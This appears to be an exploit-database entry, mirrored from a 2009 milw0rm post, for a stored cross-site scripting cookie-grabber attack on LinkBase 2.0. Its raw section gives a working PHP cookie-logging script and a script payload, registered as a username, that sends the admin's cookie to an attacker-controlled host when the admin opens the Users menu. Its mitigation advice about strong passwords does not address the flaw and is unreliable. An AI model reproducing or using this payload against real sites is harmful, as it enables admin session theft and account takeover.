Download LinkBase 2.0 Cookie Grabber Exploit

vendor:

LinkBase 2.0

by:

SirGod

7,5

CVSS

HIGH

Cookie Grabber Exploit

N/A

CWE

Product Name: LinkBase 2.0

Affected Version From: LinkBase 2.0

Affected Version To: LinkBase 2.0

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Download LinkBase 2.0 Cookie Grabber Exploit

This exploit allows an attacker to steal the cookie of an admin user of LinkBase 2.0. The attacker creates two files, stealer.php and log.txt, and uploads them to their host. The attacker then registers as a user with a script that redirects the admin to the cookie stealer.php file when they visit the 'Users' menu from the admin panel.

Mitigation:

Ensure that all users are using strong passwords and that the application is kept up to date.

Source

Exploit-DB raw data:

#################################################################################################################
[+] Download LinkBase 2.0 Cookie Grabber Exploit
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
[+] Greetz : All my friends
#################################################################################################################

[+] Make 2 files and upload to your host :

  stealer.php  - > Put the following code into the file :
 
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

  log.txt   - > CHMOD it 777 and put in the same directory with stealer.php
 
[+] Register as :

  <script>document.location ="http://[YOUR_HOST]/[path]/stealer.php?cookie=" + document.cookie;</script>

  Every time the admin will visit the "Users" menu from admin panel he will be redirected to your cookie stealer.

#################################################################################################################

# milw0rm.com [2009-05-05]